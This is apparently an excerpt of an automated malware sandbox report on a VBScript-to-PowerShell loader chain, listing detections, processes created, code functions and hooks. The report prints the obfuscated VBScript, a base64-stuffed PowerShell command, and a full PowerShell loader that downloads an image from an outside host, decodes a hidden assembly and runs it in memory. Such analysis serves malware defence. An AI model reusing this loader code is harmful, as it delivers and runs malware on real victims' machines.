            Source: Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000008.00000003.1873152965.0000000004D8D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.1875146322.0000000004F39000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2932383169.00000000050E0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2932383169.000000000527E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: firefox.pdb source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2058701262.0000000006A65000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.CreateObject("WScript.Shell") ovarista = ("$(@(?(@?@?dig@?@? = '") & tangendo & "'" ovarista = ovarista & ";$@?@?Wjuxd = [??}@*y??}@*t?*(?m.T?*(?xt.?*(?n(@(?(oding]::Uni(@(?(od?*(?.G?*(?tString(" ovarista = ovarista & "[??}@*y??}@*" ovarista = ovarista & "t?*(?" ovarista = ovarista & "m.(@(?(@?@?" ovarista = ovarista & "nv?*(?r" ovarista = ovarista & "t]:" ovarista = ovarista & ":Fr@?@?" ovarista = ovarista & "mba??}@*" ovarista = ovarista & "?*(?64??}@*tring( $(@(?(" ovarista = ovarista & "@?@?d" ovarista = ovarista & "ig@?@?.r?*(?" ovarista = ovarista & "@%*:&la" ovarista = ovarista & "(@(?(?*(?('" ovarista = ovarista & "DgTr?*(?" ovarista = ovarista & "','" ovarista = ovarista & "A" ovarista = ovarista & "') ))" ovarista = ovarista & ";@%*:&@?@?wer??}@*hell.?*(?x?*(? -window??}@*tyl?*(? hidd?*(?n -?*(?x?*(?cution@%*:&olicy by@%*:&as??}@* -No@%*:&rofil?*(? -command $OWjuxD" ovarista = Replace(ovarista,"@%*:&","p") ovarista = Replace(ovarista,"(@(?(","c") ovarista = Replace(ovarista,"?*(?","e") ovarista = Replace(ovarista,"@?@?","o") ovarista = Replace(ovarista,"??}@*","s") trapalhona1 = "@%*:&@?@?wer??}@*hell -(@(?(@?@?mmand " trapalhona1 = Replace(trapalhona1,"(@(?(","c") trapalhona1 = Replace(trapalhona1,"??}@*","s") trapalhona1 = Replace(trapalhona1,"@?@?","o") trapalhona1 = Replace(trapalhona1,"@%*:&","p") trapalhona = trapalhona1 & """" & ovarista & """" Cama.Run trapalhona, 0, False IHost.Arguments();IArguments2.Count();IServerXMLHTTPRequest2.open("GET", "https://paste.ee/d/K2No9", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("WScript.Shell");IWshShell3.Run("powershell -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreC", "0", "false")
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTreb
            Suspicious powershell command line found
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8000AD pushad ; iretd 1_2_00007FFD9B8000C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0041E87D push ds; retf 5_2_0041E880
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0041E83C push 2E339416h; ret 5_2_0041E83A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0041698A push esp; ret 5_2_0041698B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0041C238 push esp; retf 5_2_0041C23D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00416C44 push 7B91E71Ah; retf 5_2_00416C54
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0041D4B5 push eax; ret 5_2_0041D508
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0041ED66 pushad ; retf 5_2_0041ED67
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0041D56C push eax; ret 5_2_0041D572
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0041D502 push eax; ret 5_2_0041D508
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0041D50B push eax; ret 5_2_0041D572
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00405E02 push esp; ret 5_2_00405E04
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0041EEDF push FFFFFFD3h; iretd 5_2_0041EEE1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0041E770 push 2E339416h; ret 5_2_0041E83A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013809AD push ecx; mov dword ptr [esp], ecx5_2_013809B6
            Source: C:\Windows\explorer.exeCode function: 6_2_0B414B02 push esp; retn 0000h6_2_0B414B03
            Source: C:\Windows\explorer.exeCode function: 6_2_0B414B1E push esp; retn 0000h6_2_0B414B1F
            Source: C:\Windows\explorer.exeCode function: 6_2_0B4149B5 push esp; retn 0000h6_2_0B414AE7
            Source: C:\Windows\explorer.exeCode function: 6_2_0E8ECB02 push esp; retn 0000h6_2_0E8ECB03
            Source: C:\Windows\explorer.exeCode function: 6_2_0E8ECB1E push esp; retn 0000h6_2_0E8ECB1F
            Source: C:\Windows\explorer.exeCode function: 6_2_0E8EC9B5 push esp; retn 0000h6_2_0E8ECAE7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_000E1A6D push ecx; ret 8_2_000E1A80
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_050E27FA pushad ; ret 8_2_050E27F9
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_050EB008 push es; iretd 8_2_050EB009
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_050E1368 push eax; iretd 8_2_050E1369
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_050E225F pushad ; ret 8_2_050E27F9
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_050E9939 push es; iretd 8_2_050E9940
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051109AD push ecx; mov dword ptr [esp], ecx8_2_051109B6
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_050E283D push eax; iretd 8_2_050E2858
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02F4C238 push esp; retf 8_2_02F4C23D
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02F4E87D push ds; retf 8_2_02F4E880

            Hooking and other Techniques for Hiding and Protection

            barindex
            Modifies the prolog of user mode functions (user mode inline hooks)
            Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x80 0x0E 0xEA
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
